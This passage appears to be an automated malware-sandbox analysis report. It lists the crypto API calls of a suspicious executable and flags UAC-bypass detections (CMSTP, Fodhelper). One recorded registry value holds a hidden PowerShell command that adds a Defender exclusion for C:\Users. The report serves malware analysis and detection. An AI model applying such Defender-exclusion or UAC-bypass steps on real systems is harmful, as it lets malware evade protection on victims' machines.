                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,25_2_00007FF67DEDC940
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06D2C NCryptFreeBuffer,#360,25_2_00007FF67DF06D2C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE92D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DE92D18
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0D14 NCryptFinalizeKey,#205,#357,#357,25_2_00007FF67DED0D14
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,25_2_00007FF67DEC2CF8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,25_2_00007FF67DED2CFC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06CE0 NCryptEnumStorageProviders,#360,25_2_00007FF67DF06CE0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE94CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,25_2_00007FF67DE94CC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEDACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,25_2_00007FF67DEDACAC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DEC4CA0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06C88 NCryptEnumAlgorithms,#360,25_2_00007FF67DF06C88
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,25_2_00007FF67DED2C80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DF0A9F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE36C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,25_2_00007FF67DE36C4C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0C3C NCryptExportKey,#205,#359,#359,#357,25_2_00007FF67DED0C3C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06C30 NCryptOpenStorageProvider,#360,25_2_00007FF67DF06C30
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE6CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,25_2_00007FF67DE6CC24
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF00BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,25_2_00007FF67DF00BF4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,25_2_00007FF67DED2BC0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,25_2_00007FF67DEFCBB4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,25_2_00007FF67DE5CB98
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF00B9C CryptHashData,GetLastError,#357,25_2_00007FF67DF00B9C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,25_2_00007FF67DED0B80
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF0A740
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2724 CryptDecodeObject,GetLastError,#357,25_2_00007FF67DEC2724
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE726E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,25_2_00007FF67DE726E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,25_2_00007FF67DEF86D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF066D8 NCryptFreeObject,#360,25_2_00007FF67DF066D8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,25_2_00007FF67DEA4694
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE66694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,25_2_00007FF67DE66694
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,25_2_00007FF67DF08814
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF06654 NCryptGetProperty,#360,25_2_00007FF67DF06654
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,25_2_00007FF67DE9A654
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE60630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE60630
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE58600 #357,CryptDecodeObject,GetLastError,LocalFree,25_2_00007FF67DE58600
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,25_2_00007FF67DE925E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,25_2_00007FF67DE5C5D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,25_2_00007FF67DF3E8B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED65B4 NCryptIsKeyHandle,_CxxThrowException,25_2_00007FF67DED65B4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,25_2_00007FF67DECE57C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF04914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,25_2_00007FF67DF04914
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,25_2_00007FF67DEBE914
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED08EC BCryptGetProperty,#205,#359,#357,#357,25_2_00007FF67DED08EC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,25_2_00007FF67DF3A58C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DF0A590
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE4A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,25_2_00007FF67DE4A8CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0844 BCryptExportKey,#205,#359,#357,#357,25_2_00007FF67DED0844
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE56824 CryptHashCertificate,GetLastError,#357,25_2_00007FF67DE56824
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEBC7F0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED07F4 BCryptDestroyKey,#205,#357,25_2_00007FF67DED07F4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE367CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE367CC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEE07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEE07D0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC27BC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED07A4 BCryptDestroyHash,#205,#357,25_2_00007FF67DED07A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DED0740 BCryptCloseAlgorithmProvider,#205,#357,#357,25_2_00007FF67DED0740
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE70300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,25_2_00007FF67DE70300
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEA6280
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,25_2_00007FF67DEF2278
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEFE274
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,25_2_00007FF67DF08404
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,25_2_00007FF67DECE1F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEBA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,25_2_00007FF67DEBA1E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEF61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,25_2_00007FF67DEF61AC
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE721A4 #360,#359,#357,#357,BCryptFreeBuffer,25_2_00007FF67DE721A4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEB6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,25_2_00007FF67DEB6194
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE9417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,25_2_00007FF67DE9417C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3613C CryptDecodeObjectEx,25_2_00007FF67DF3613C
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEFE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,25_2_00007FF67DEFE516
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,25_2_00007FF67DE5C514
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE444E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE444E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEA24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,25_2_00007FF67DEA24D4
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,25_2_00007FF67DEC8488
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF0A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,25_2_00007FF67DF0A1F8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF36214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,25_2_00007FF67DF36214
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,25_2_00007FF67DEAA450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEAC450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,25_2_00007FF67DEAC450
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE54410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,25_2_00007FF67DE54410
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE723E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,25_2_00007FF67DE723E8
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF08298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,25_2_00007FF67DF08298
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE5E3B0 #357,#357,CryptDecodeObject,LocalFree,25_2_00007FF67DE5E3B0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DF3A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,25_2_00007FF67DF3A2E0
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC6374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,25_2_00007FF67DEC6374
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DEC2358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,25_2_00007FF67DEC2358
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA23837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,28_2_1BA23837
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21093837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,36_2_21093837
                    Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_1f2c415d-a

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_210674FD _wcslen,CoGetObject,36_2_210674FD
                    UAC bypass detected (Fodhelper)
                    Source: C:\Users\Public\ger.exeRegistry value created: NULL C:\\Users\\Public\\xkn.exe -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users Jump to behavior
                    Source: unknownHTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 